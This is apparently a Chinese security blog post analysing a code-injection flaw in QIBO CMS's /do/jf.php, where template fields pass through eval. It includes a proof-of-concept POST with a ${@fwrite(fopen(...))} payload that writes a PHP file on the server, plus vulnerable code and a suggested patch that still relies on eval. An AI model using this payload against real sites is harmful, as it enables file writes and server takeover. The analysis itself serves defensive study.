catalog

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

这个漏洞的成因简单来说可以归纳为如下几点

. 类似于ECSHOP的的模版代码编译功能,QIBO允许在文章中添加指定格式的模版代码

. 在显示文章的时候,QIBO会使用: eval("\$rs2[title]=\"$rs2[title]\";");方式对模版动态变量进行赋值

. 黑客可以通过XSS、CSRF劫持管理员向数据库中注入恶意代码: ${@fwrite(fopen('ali.php', 'w+'), 'test’)}

. 由于PHP的动态执行特性,eval赋值的时候,在双引号中的代码会被动态执行,从而导致原本的变量赋值变成了代码执行入口

Relevant Link:

2. 漏洞触发条件

攻击向量

. 黑客需要向{$pre}jfabout数据表注入恶意代码

    ) 黑客直接拿到管理员密码,登录了后台

    ) CSRF

    ) XSS攻击

. 文章显示的时候,对模版变量进行解析,未对模版内容本身进行有效的过滤、恶意判断

0x1: POC

http://localhost/qibo/admin/index.php?lfj=jfadmin&action=addjf

POST:

title=test&content=${@fwrite(fopen('ali.php', 'w+'), 'test’)}&list=1

或者普通用户访问/do/jf.php,即可在do目录下生成ali.php文件

3. 漏洞影响范围
4. 漏洞代码分析

/do/jf.php

<?php

require(dirname(__FILE__)."/"."global.php");

$lfjdb && $lfjdb[money]=get_money($lfjdb[uid]);

$query = $db->query("SELECT * FROM {$pre}jfsort ORDER BY list");

while($rs = $db->fetch_array($query))

{

    $fnameDB[$rs[fid]]=$rs[name];

    $query2 = $db->query("SELECT * FROM {$pre}jfabout WHERE fid='$rs[fid]' ORDER BY list");

    while($rs2 = $db->fetch_array($query2))

    {

        /*

        1. 用于变量赋值的客体用双引号包裹,PHP curl syntax(${${}})可以执行

        2. 未对模版内容进行转义处理,存在闭合注入的可能

        */

        eval("\$rs2[title]=\"$rs2[title]\";");

        eval("\$rs2[content]=\"$rs2[content]\";");

        $jfDB[$rs[fid]][]=$rs2;

    }

}

require(ROOT_PATH."inc/head.php");

require(html("jf"));

require(ROOT_PATH."inc/foot.php");

?>

/hack/jfadmin/admin.php

//通过这个向量黑客可以向{$pre}jfabout数据表注入恶意代码

..

elseif($action=="addjf"&&$Apower[jfadmin_mod])

{

    $db->query("INSERT INTO `{$pre}jfabout` ( `fid` , `title` , `content`, `list` ) VALUES ( '$fid', '$title', '$content', '$list' )");

    jump("添加成功","index.php?lfj=jfadmin&job=listjf&fid=$fid",);

}

..

5. 防御方法

/do/jf.php

<?php

require(dirname(__FILE__)."/"."global.php");

$lfjdb && $lfjdb[money]=get_money($lfjdb[uid]);

$query = $db->query("SELECT * FROM {$pre}jfsort ORDER BY list");

while($rs = $db->fetch_array($query)){

    $fnameDB[$rs[fid]]=$rs[name];

    $query2 = $db->query("SELECT * FROM {$pre}jfabout WHERE fid='$rs[fid]' ORDER BY list");

    while($rs2 = $db->fetch_array($query2)){

        //eval("\$rs2[title]=\"$rs2[title]\";");

        //eval("\$rs2[content]=\"$rs2[content]\";");

        $rs2[title] = addslashes($rs2[title]);

        $rs2[content] = addslashes($rs2[content]);

        eval("\$rs2[title]='$rs2[title]';");

        eval("\$rs2[content]='$rs2[content]';");

        $jfDB[$rs[fid]][]=$rs2;

    }

}

require(ROOT_PATH."inc/head.php");

require(html("jf"));

require(ROOT_PATH."inc/foot.php");

?>

代码防御的关键点主要如下

. 将eval赋值语句内的双引号改为单引号,禁止其PHP动态执行特性

. 在参数外层包裹addslash,防止黑客注入进行闭合

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

QIBO /do/jf.php EvilCode Execution Injected By /hack/jfadmin/admin.php的更多相关文章

  1. NetBpm XML解读(5)

    原文: nPdl的翻译 在看NetBPM的nPdl文档时做了个翻译,一来是让自己能更好的理解nPdl,二来是希望能得到关心NetBPM的同志的指导.    由于对工作流不熟悉,所以有不少术语翻译没有把 ...

  2. AOP aspect XML 配置

    /** * 00配置接入点:定义一个切入点 * execution(* com.foen.foensys.controller..*.*(..))") "*" 第一个* ...

  3. Spring Boot -- Spring AOP原理及简单实现

    一.AOP基本概念 什么是AOP,AOP英语全名就是Aspect oriented programming,字面意思就是面向切面编程.面向切面的编程是对面向对象编程的补充,面向对象的编程核心模块是类, ...

  4. struts2 CVE-2013-1965 S2-012 Showcase app vulnerability allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  5. CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...

  6. Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution

    EDB-ID: 41929 Author: vportal Published: 2017-04-25 CVE: N/A Type: Remote Platform: Windows Aliases: ...

  7. 执行监听器( Execution listener)

    相关类: org.activiti.engine.delegate.ExecutionListener org.activiti.engine.delegate.TaskListener org.ac ...

  8. Javascript 的执行环境(execution context)和作用域(scope)及垃圾回收

    执行环境有全局执行环境和函数执行环境之分,每次进入一个新执行环境,都会创建一个搜索变量和函数的作用域链.函数的局部环境不仅有权访问函数作用于中的变量,而且可以访问其外部环境,直到全局环境.全局执行环境 ...

  9. Error:Execution failed for task ':app:clean'.

    运行时出现 Error:Execution failed for task ':app:clean'. 错误,Builld->Clean Project即可.

随机推荐

  1. (转)c# 解析JSON的几种办法

    来自:http://blog.csdn.net/gaofang2009/article/details/6073029 欲成为海洋大师,必知晓海中每一滴水的真名. 刚开始只是想找一个转换JSON数组的 ...

  2. JAVA CDI 学习(5) - 如何向RESTFul Service中注入EJB实例

    RESTFul Service中如果要注入EJB实例,常规的@Inject将不起作用,在Jboss中,应用甚至都启动不起来(因为@Inject注入失败),解决方法很简单:将@Inject换成@EJB ...

  3. centos6-honeyd安装&配置

    安装 需要装 libpcap libevent libdnet 等(!) 有些用的yum,有些下载的安装包手动安装 (wget tar configure make install 非常linux) ...

  4. Oracle 常见错误排查

    1. java.sql.SQLException: ORA-01000: 超出打开游标的最大数 step 1: 查看数据库当前的游标数配置slqplus:show parameter open_cur ...

  5. Eclipse 反编译插件JadClipse安装

    下载jadClipse地址: 链接: http://pan.baidu.com/s/1kTN4TPd  提取码: 3fvd 将net.sf.jadclipse_3.3.0.jar拷贝到eclipse的 ...

  6. hibernate Expression详解

    关键字: hibernate expression hibernate Expression详解Expression.gt:对应SQL条件中的"field > value " ...

  7. React-Native运行知乎日报遇到的问题

    研究几天RN(React-Native)后,跟着官方的demo做了一下电影图片显示的那个,但是总感觉官方的demo欠缺点什么,所以找来找去找到了RN版的知乎日报,话说知乎日报什么版的都有,不信你们上网 ...

  8. WP8 对音视频格式支持的完整说明

    Supported media codecs for Windows Phone http://msdn.microsoft.com/en-us/library/windowsphone/develo ...

  9. floyd原理以及求最小环

    floyd这个东西学会了好久了,但是原理总是忘记,或者说没有真正的明白,这里在说一下. 我们要求的是任意的 i,j 之间的最短路径,用动态规划的思想来解决就是f[i,j,k]表示i到j中间节点不超过k ...

  10. 《TCP/IP详解卷1:协议》第1章 概述-读书笔记

    章节回顾: <TCP/IP详解卷1:协议>第1章 概述-读书笔记 <TCP/IP详解卷1:协议>第2章 链路层-读书笔记 <TCP/IP详解卷1:协议>第3章 IP ...